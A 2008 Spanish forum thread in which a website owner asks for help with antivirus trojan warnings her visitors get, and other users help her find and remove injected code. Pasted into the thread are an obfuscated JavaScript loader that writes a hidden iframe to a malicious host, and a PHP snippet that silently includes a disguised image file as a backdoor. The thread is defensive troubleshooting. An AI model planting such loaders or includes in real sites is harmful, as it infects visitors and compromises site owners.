Foros de daboweb
SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc => Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware => Mensaje iniciado por: Schaman en 07 de Mayo de 2008, 08:48:07 pm
-
Hola , ojalá alguien pueda ayudarme con esto , he estado buscando en google pero no he encontrado nada para solucionarlo.
Desde hace una semana cuando varias personas intentan acceder a la misma , el antivirus les detecta un troyano , esas personas usan el Explorer , yo en cambio uso Firefox y a mi no me detecta nada el antivirus , no sé si es que es muy malo jeje.
Y bueno lo que aparece cuando entran en la web además de en el foro y galeria , es esto:
Fichero contiene un caballo de troya . Le recomendamos terminar la descarga
Un caballo de troya:
Trojan.Downloader.JS.Inor.a :
Y enlazan al apartado de noticias de la web , cutenews.
Los del servidor dicen que ellos no han detectado nada que de donde puede venir es de algun elemento externo , foro , galeria , cutenews.
No sé qué hacer y como decia , en google no he encontrado nada .
Un saludo y gracias de antemano.
-
¿Y cual has dicho que es la página en cuestión?
-
Gracias por responder.
La página es esta http://www.davidbustamanteweb.com/indexx.html
-
Una de las pesonas a las que el antivirus le detecta el troyano me dice que le sale esto cuando se intenta instalar
C:\Documents and Settings\Configuración local\Archivos temporales de Internet\Content.IE5\90FD49JU\index[5].htm
C:\Documents and Settings\\Configuración local\Archivos temporales de Internet\Content.IE5\IPGJMD25\index[4].htm
-
Al entrar en la página sale un pop-up de -http://www.123tonosgratis.com/- .... es bastante posible que ese aviso proceda de ese pop-up, muchas de estas páginas instalan basura en los equipos de la gente que las visita para meterles luego publicidad a cada momento.
Si no fuese de esa página será de alguna otra de la cual tengas un script instalado, por ejemplo el de las estadísticas o algún otro.
-
Entonces puede ser cosa del contador de visitas? es de motigo.com
Ese script entonces estaría el la carpeta del contador que está en mi servidor,no?
Gracias otra vez.
Al entrar en la página sale un pop-up de -http://www.123tonosgratis.com/- .... es bastante posible que ese aviso proceda de ese pop-up, muchas de estas páginas instalan basura en los equipos de la gente que las visita para meterles luego publicidad a cada momento.
Si no fuese de esa página será de alguna otra de la cual tengas un script instalado, por ejemplo el de las estadísticas o algún otro.
-
Puede ser, la forma de saberlo a ciencia cierta es quitarlo y ver si el problema persiste.
-
Ok pues a ver si lo puedo solucionar.
Gracias
-
Hola otra vez!
Me parece que lo que me decías del Script ya sé donde está .
Mirando el Codigo Fuente de la Galeria y del Foro de la web , me aparece lo siguiente :
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6
E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73
%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20
%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65
%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43
%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D
%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64
%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29
%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Djgsbnf%2631xjeui%264E2%26
31ifjhiu%264E2%2631tuzmf%264E%2633cpsefs%264B%26311qy%264C%2633%2631tsd%264E%2633iuuq
%264B00xxx/hpphmf.tubujtujd/do0ofx0joefy/qiq%264Gxnje%264E543%2633%264F%2
64D0jgsbnf%264F1')</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en"
xml:lang="en">
<head>
Eso es lo primero que sale , y mirando en otro foro que no tiene ningun problema , no sale eso , sino lo siguiente :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en"
xml:lang="en">
No estoy muy segura , porque de estos temas entiendo poco , puede ser eso lo que hace que aparezca el aviso del supuesto troyano? cuando entran en el foro y galeria también salía y claro en el index de la web.
-
Revisa todos los index donde aparezca y quítalo ..... si la web tiene algún sistema de caché deberás vaciar esa caché para que la gente pueda acceder a la página "nueva" sin ese código.
-
Gracias otra vez.
Como me dijiste estuve revisando el index en la carpeta del foro pero ahí no aparece lo que veo en el codigo fuente , no sé si es lo normal , como dije no sé mucho de estos temas , lo que me aperece es esto que para colmo enlaza con la galeria ?¿ :
<?php
error_reporting(0);
if (file_exists("/web/htdocs/www.davidbustamanteweb.com/home/galeria/albums/userpics/10001/45563131x.jpg")) {
include("/web/htdocs/www.davidbustamanteweb.com/home/galeria/albums/userpics/10001/45563131x.jpg");
} else
if (ini_get("register_globals")) {
if($GLOBALS["fx"]==0) {
$GLOBALS["fx"]=1;
echo "";
}
} else {
echo "";
}
?><?php
Qué tengo que hacer borrar toda esa parte ?
Aunque viendo ese del index.php en mi PC no aparace lo del error reporting y demás , subo eso y la sustiuyo por el del servidor ?
Eso mismo también pasa con la Galeria de la web.
Y otra cosa , qué puedo hacer para proteger la web , donde tengo contratado el servidor-dominio me dicen que sólo tienen antivirus y antispam para el correo.
-
La forma de borrar algo es con un editor de texto o editor de páginas web .... lo suprimes como en cualquier documento de texto y guardas los cambios, luego sustituyes el archivo por el que tienes en el servidor.
La forma de proteger un sitio web es algo compleja, si usas un gestor de contenidos (Joomla!, Wordpress, Drupal, etc) debes de tener siempre la última versión actualizada y andar pendiente de las actualizaciones o parches que se publiquen para evitar que alguien pueda explotar una vulnerabilidad y hacerte alguna "trastada"; la gente del hosting poco puede hacer en ese sentido.
De todas formas siempre es bueno que guardes una copia de lo que vayas a cambiar por si luego no funcionase correctamente poder restaurarlo.
En cualquier caso si incluyes un código en el sitio y quien te proporciona ese código se aprovecha para enviarle publicidad a tus visitantes (o intentar instalarles algo) la cuestión no es de seguridad ya que en ese caso el código malicioso lo habrías incluido tú y no sería cuestión de una vulnerabilidad explotada.
-
Uff disculpa pero donde se encuentra lo del sistema de caché ?
En el apartado del foro que hay en el servidor aparece una carpeta con ese nombre , a eso te refieres?
Revisa todos los index donde aparezca y quítalo ..... si la web tiene algún sistema de caché deberás vaciar esa caché para que la gente pueda acceder a la página "nueva" sin ese código.
-
Esa carpeta es, elimina el contenido y listo.